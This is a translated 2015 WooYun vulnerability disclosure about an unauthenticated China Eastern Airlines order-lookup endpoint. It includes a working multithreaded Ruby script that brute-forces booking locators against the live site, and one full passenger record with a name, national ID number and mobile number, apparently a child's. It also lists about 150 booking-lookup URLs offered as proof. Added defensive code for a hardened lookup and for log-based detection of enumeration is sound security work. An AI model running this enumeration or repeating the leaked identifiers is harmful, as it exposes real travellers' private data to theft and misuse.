Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0100000

Title: Unauthenticated interface at China Eastern Airlines, combined with design weaknesses in PNR locators and e-ticket numbers, leaks a large volume of flight booking data (names, flights, destinations, national ID numbers, mobile numbers, etc.)

Vendor: 中国东方航空股份有限公司 (China Eastern Airlines Co., Ltd.)

Author: 北京方便面

Submitted: 2015-03-07 13:50

Fixed: 2015-04-21 13:52

Published: 2015-04-21 13:52

Type: unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-07: details sent to the vendor, awaiting vendor handling
2015-03-07: vendor confirmed; details visible to the vendor only
2015-03-17: details opened to core white hats and domain experts
2015-03-27: details opened to regular white hats
2015-04-06: details opened to intern white hats
2015-04-21: details opened to the public

Brief description:

A PNR (Passenger Name Record) is the booking record held in the civil-aviation reservation system: it records the passenger's itinerary, the seats held on each flight, and the passenger's personal details.
The same interface returns records for several carriers, including 海南航空 (Hainan Airlines), 联合航空 (China United Airlines) and 上海航空 (Shanghai Airlines).
The records contain names, flights, destinations, national ID numbers, mobile numbers and more.
A large number of bookings for flights that have not yet departed are attached as proof.

Detailed description:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
This interface can be called without any authentication: the locator in queryText is the only thing it checks.
A PNR locator is 5 to 10 characters drawn from digits and upper-case letters; in practice 6-character locators are by far the most common.
Because the number of live bookings is large, blind guessing (collision) still turns up valid locators in quantity.
With a valid locator in hand, anyone can read the corresponding passenger's booking.
For example:

1.张婧萌 MFJDWN
2. KN5927 V SA21MAR NAYXMN RR1 0710 0955 E --T4
3.T SHA/SHA/T-021-34064880-454360/SHA HUA CHENG SOUTHWEST TRA
4.T SHA/VEL/SHAO/JI HONG
5.SSR FOID KN HK1 NI110108201111068247/P1
6.SSR TKNE KN HK1 NAYXMN 5927 V21MAR 7818581172025/1/P1
7.SSR CHLD KN HK1 06NOV11/P1
8.OSI CA CTC 021-51069999X454360
9.OSI KN CTCT18918086637
10.OSI CA TKNA TICTKED
11.PEK1E/JQ2DJ8/SHA717


This one record contains the passenger's name, flight, national ID number and mobile number, among other personal data.
Attached script:

# encoding: utf-8
# Original author's PoC: guesses locators against the unauthenticated query
# endpoint from 20 threads and records any URL whose response contains a
# CTC (contact) line, which only a real PNR display produces.
require 'net/http'
require 'uri'

LOG_LOCK = Mutex.new   # the threads append to one shared log file

def makefile(file, string)
  LOG_LOCK.synchronize do
    File.open(File.join(Dir.pwd, file), 'a') { |f| f.puts string }
  end
end

def get_url(url)
  uri = URI.parse(url)
  http = Net::HTTP.new(uri.host, uri.port)
  http.get(uri.request_uri)   # Net::HTTP#get takes path+query, not a URI object
end

CHARSET  = (0..9).to_a + ('A'..'Z').to_a   # the 36-character locator alphabet
PREFIXES = ('M'..'N').to_a                 # every locator in the proof list starts with M or N

threads = []
20.times do
  threads << Thread.new do
    10_000_000.times do
      # first character M or N, then five characters drawn with replacement
      # so locators with repeated characters are reachable
      pnr = PREFIXES.sample + Array.new(5) { CHARSET.sample }.join
      # alternative endpoint noted by the author:
      # url = "http://scb2b.travelsky.com/scetb2b/b2b/orderquery/pnrdisplay.jsp?pnrno=#{pnr}"
      url = "http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=#{pnr}"
      puts pnr
      resp = get_url(url)
      response = resp.body.force_encoding('UTF-8')   # use 'gb2312' if the page is not UTF-8
      if response =~ /CTC/   # a CTC line means a real PNR came back
        puts url
        makefile('log.txt', url)
      end
    end
  end
end
threads.each(&:join)
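The flaw is that the locator is both the identifier and the only credential, so the endpoint's security is exactly the entropy of a 6-character string that the guessing script above already cuts down to a two-letter prefix and five characters. The following is an added example, not code from the report or from the vendor: it models the lookup endpoint as reported next to a hardened version that requires a second factor bound to the booking (the passenger's surname, an assumed choice), returns one generic failure, and gives each client a bounded guess budget. The bookings, surnames and client addresses are constructed, and the per-client limits are illustrative values.

```ruby
# Added example, not code from the original report or from the vendor.
# Models the order-lookup endpoint two ways: as reported (the 6-character
# locator is the only credential) and hardened (locator + a second factor
# bound to the booking, generic failures, per-client guess budget).
require 'digest'

CHARSET = (('A'..'Z').to_a + ('0'..'9').to_a).freeze   # 36-character locator alphabet

# Constructed sample bookings keyed by locator; every value here is made up.
ORDERS = {
  'MXK4T2' => { surname: 'ZHANG', flight: 'KN5927', id_no: '1101********1234' },
  'NQ7B9D' => { surname: 'LI',    flight: 'MU5101', id_no: '3101********5678' },
}.freeze

# Size of the space the report's script searches: first letter M or N,
# then five characters from CHARSET (2 * 36**5 = 120,932,352).
def locator_keyspace(prefixes: 2, tail_length: 5)
  prefixes * CHARSET.size**tail_length
end

# Expected guesses per valid locator when `live` bookings share that space.
# The live-booking count is an assumption supplied by the caller.
def guesses_per_hit(live)
  locator_keyspace / live.to_f
end

# As reported: queryText=<locator> returns the full record to anyone.
def lookup_vulnerable(pnr)
  ORDERS[pnr.to_s.upcase]
end

# Hardened lookup: the caller must also present the passenger's surname,
# failures are indistinguishable, and each client gets a bounded budget.
class OrderLookup
  MAX_ATTEMPTS = 5     # lookups allowed per client per WINDOW (illustrative)
  WINDOW       = 600   # seconds

  def initialize(clock: -> { Time.now.to_f })
    @clock = clock
    @attempts = Hash.new { |h, k| h[k] = [] }
  end

  # Returns the order hash, :not_found, or :rate_limited.
  def lookup(client, pnr, surname)
    return :rate_limited if over_budget?(client)
    @attempts[client] << @clock.call
    order = ORDERS[pnr.to_s.upcase]
    # One generic answer whether the locator or the surname was wrong.
    return :not_found unless order && secure_equal(order[:surname], surname.to_s.upcase)
    order
  end

  private

  def over_budget?(client)
    now = @clock.call
    @attempts[client].reject! { |t| now - t > WINDOW }
    @attempts[client].size >= MAX_ATTEMPTS
  end

  # Constant-time comparison over fixed-length digests, so response timing
  # does not leak how much of the surname matched.
  def secure_equal(a, b)
    da = Digest::SHA256.digest(a)
    db = Digest::SHA256.digest(b)
    da.bytes.zip(db.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# The report's guessing strategy: M or N, then five random characters.
def random_locator(rng)
  %w[M N].sample(random: rng) + Array.new(5) { CHARSET.sample(random: rng) }.join
end

# Replays a candidate list (200 random guesses plus the two valid locators,
# as if the guesser had got lucky) against both endpoints from one address.
def simulate(seed: 1)
  rng = Random.new(seed)
  candidates = (Array.new(200) { random_locator(rng) } + ORDERS.keys).shuffle(random: rng)
  hardened = OrderLookup.new
  stats = { vulnerable_hits: 0, hardened_hits: 0, rate_limited: 0 }
  candidates.each do |pnr|
    stats[:vulnerable_hits] += 1 if lookup_vulnerable(pnr)
    case hardened.lookup('203.0.113.9', pnr, 'WANG')   # guesser does not know the surname
    when :rate_limited then stats[:rate_limited] += 1
    when :not_found    then nil
    else stats[:hardened_hits] += 1
    end
  end
  stats
end

if __FILE__ == $PROGRAM_NAME
  puts "locator keyspace: #{locator_keyspace}"
  p simulate
  p OrderLookup.new.lookup('198.51.100.4', 'MXK4T2', 'zhang')   # legitimate passenger
end
```

Against the reported endpoint the replay finds both bookings; against the hardened one it finds none, because the correct locator without the surname is indistinguishable from a wrong locator, and the client is cut off after its fifth lookup in the window. Note that the budget counts every lookup, not only failures, so a guesser cannot learn anything from which requests were rate-limited. A surname is a weak second factor on its own (it narrows but does not stop targeted attacks), so in practice the lookup should also be tied to an authenticated session or a one-time link sent to the booking's contact details.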


E-ticket number:
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=2&queryText=784-2168259211
With radio=2 the same endpoint looks a booking up by e-ticket number instead. Ticket numbers are issued sequentially, so this mode needs no guessing at all: an attacker can simply walk the number range.
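Both modes of the endpoint leave a distinctive trace in the web server's access log: one client presenting many different locators in a short span, or one client stepping through consecutive ticket numbers. The following is an added example, not part of the original report, showing detection logic for both patterns over constructed combined-format log lines. The client addresses are RFC 5737 test ranges, the locators other than those on the page are made up, the two ticket numbers after 784-2168259211 are constructed neighbours, and the thresholds are illustrative.

```ruby
# Added example, not part of the original report: detection logic for the
# two abuse patterns against the lookup endpoint, run over constructed log lines.
# Rule 1: one client trying many distinct locators (radio=1) in a short window.
# Rule 2: one client walking consecutive e-ticket numbers (radio=2).
require 'time'
require 'cgi'

ENDPOINT = '/back/ticket/ticket-search!queryOrderTikDirect.shtml'

# Constructed sample traffic in combined-log style; not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.9 - - [07/Mar/2015:13:00:01 +0800] "GET #{ENDPOINT}?radio=1&queryText=MXK4T2 HTTP/1.1" 200 5120
  203.0.113.9 - - [07/Mar/2015:13:00:02 +0800] "GET #{ENDPOINT}?radio=1&queryText=NQ7B9D HTTP/1.1" 200 5118
  203.0.113.9 - - [07/Mar/2015:13:00:03 +0800] "GET #{ENDPOINT}?radio=1&queryText=MA1B2C HTTP/1.1" 200 2210
  203.0.113.9 - - [07/Mar/2015:13:00:04 +0800] "GET #{ENDPOINT}?radio=1&queryText=NZ9Y8X HTTP/1.1" 200 2210
  203.0.113.9 - - [07/Mar/2015:13:00:05 +0800] "GET #{ENDPOINT}?radio=1&queryText=MK3J7H HTTP/1.1" 200 2210
  203.0.113.9 - - [07/Mar/2015:13:00:06 +0800] "GET #{ENDPOINT}?radio=1&queryText=NP0Q4R HTTP/1.1" 200 2210
  198.51.100.7 - - [07/Mar/2015:13:05:10 +0800] "GET #{ENDPOINT}?radio=2&queryText=784-2168259211 HTTP/1.1" 200 5301
  198.51.100.7 - - [07/Mar/2015:13:05:11 +0800] "GET #{ENDPOINT}?radio=2&queryText=784-2168259212 HTTP/1.1" 200 5299
  198.51.100.7 - - [07/Mar/2015:13:05:12 +0800] "GET #{ENDPOINT}?radio=2&queryText=784-2168259213 HTTP/1.1" 200 5305
  192.0.2.5 - - [07/Mar/2015:13:10:00 +0800] "GET #{ENDPOINT}?radio=1&queryText=MXK4T2 HTTP/1.1" 200 5120
  192.0.2.5 - - [07/Mar/2015:13:10:05 +0800] "GET /index.shtml HTTP/1.1" 200 8801
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# One log line -> event hash, or nil for lines that do not parse.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  path, _, query = m[:target].partition('?')
  params = CGI.parse(query).transform_values(&:first)
  { ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    path: path,
    radio: params['radio'],
    query_text: params['queryText'],
    status: m[:status].to_i }
end

# Rule 1: >= threshold distinct locators from one client inside `window` seconds.
def locator_spray(events, window: 60, threshold: 5)
  alerts = []
  events.select { |e| e[:radio] == '1' }.group_by { |e| e[:ip] }.each do |ip, evs|
    evs = evs.sort_by { |e| e[:time] }
    evs.each_with_index do |start, i|
      in_window = evs[i..-1].take_while { |e| e[:time] - start[:time] <= window }
      distinct = in_window.map { |e| e[:query_text] }.uniq.size
      next if distinct < threshold
      alerts << { ip: ip, rule: :locator_spray, distinct: distinct }
      break
    end
  end
  alerts
end

# Rule 2: a run of >= min_run consecutive 13-digit ticket numbers from one client.
def ticket_enumeration(events, min_run: 3)
  alerts = []
  events.select { |e| e[:radio] == '2' }.group_by { |e| e[:ip] }.each do |ip, evs|
    serials = evs.map { |e| e[:query_text].to_s.delete('-') }
                 .grep(/\A\d{13}\z/).map(&:to_i).uniq.sort
    run = best = 1
    serials.each_cons(2) do |a, b|
      run = (b == a + 1) ? run + 1 : 1
      best = run if run > best
    end
    alerts << { ip: ip, rule: :ticket_enumeration, run: best } if best >= min_run
  end
  alerts
end

# Parses the log, keeps only hits on the lookup endpoint, applies both rules.
def analyze(log_text)
  events = log_text.each_line.map { |l| parse_line(l.strip) }.compact
                   .select { |e| e[:path] == ENDPOINT }
  locator_spray(events) + ticket_enumeration(events)
end

if __FILE__ == $PROGRAM_NAME
  analyze(SAMPLE_LOG).each { |a| p a }
end
```

The spray rule keys on cardinality of queryText per client rather than on request rate, because a guesser that throttles itself still has to present a new locator on every request; the enumeration rule keys on adjacency of the serial rather than on count, because three consecutive ticket numbers from one address is not how a passenger checks their own ticket. The legitimate single lookup from 192.0.2.5 triggers neither rule.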

Proof:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDFEM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJSGQ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML8X9B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWQYJ4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEHYG1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME6WFM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MY8XTK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT8MFX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NF3BQN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFJDWN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZTHPX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY7JHV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE5DT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCX275
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15S7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0926
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT7ZJD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE315G
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK5RFY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZM64E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8T06
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHPMZ9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV0XM1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDV6N7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MD3Z26
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MYF63Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMJGD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXEGC7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXCM1E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF5NL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJD6H4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NG2SCZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ8YWG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NDB7GV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJYWDN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLS4PQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZK6FN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT46QL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFVRNK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP0ZB
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBP8LJ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ51YW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MWH7KS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNQJT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBTYLP
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKC6Z8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8ZB9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NEDPRZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVL9JF
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG9XWT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLSF96
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTZV04
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZPE9T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX3Z7W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBW7HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MC89MS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDHX5T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP81X
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGVXW6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZWSR2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTX1RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKCVN6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG2E3W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVNG3J
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXNJTW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE7R1L
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF3XC
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZCM08
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK19HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB74GE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK69CD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTR4SV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NC84Y2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLH21
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHXJGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX6FL5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZY7QR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHKY2E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB68L1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKW016
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEC9PR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCV5F8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGENV4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGK2R3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV6PDZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZW6JD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW8PSG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLVJDT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NL3Z78
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFPDRQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVL5Q3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ906D
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZJ37C
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWQ5Z
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLECJK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEGHCD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVYFZ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW5871
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT09QG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB3DXQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWX7V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEZQS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE6NX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZ2KYN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBGR4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0FZ7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJQCS6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NFH0JS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NYE8CQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZQWX6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME3281
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ND1R8W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBK43V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCP32H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY3E7K
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTVJMY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH3VGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKZP30
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEWT6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVWNT7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZL6E4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMHFD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB7NSW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVLF3P
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGBJ6N
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCBYGX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB1L4F
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXRYWK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY1BEK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXLGB1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTQXYE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYR8V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLZPSE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLSEY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTQR6H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBQVER
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK7BJW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCND4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZVQN4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYZET
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH0F16
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCHV6Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NW59RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK8LVY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJF3N4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKM84T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDWF8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNS4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME4RN1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVR5JE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ69HZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK1ZQR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLCR20
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHD1TW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJZ0NT


[Screenshot: 屏幕快照 2015-03-07 下午1.10.34.png]
[Screenshot: 屏幕快照 2015-03-07 下午12.59.46.png]
[Screenshot: 屏幕快照 2015-03-07 下午1.00.00.png]
[Screenshot: 屏幕快照 2015-03-07 下午1.00.08.png]
[Screenshot: 屏幕快照 2015-03-07 下午1.00.19.png]
[Screenshot: 屏幕快照 2015-03-07 下午1.00.26.png]
[Screenshot: 屏幕快照 2015-03-07 下午1.00.40.png]

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B
[Screenshot: 屏幕快照 2015-03-07 下午1.02.18.png]

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ
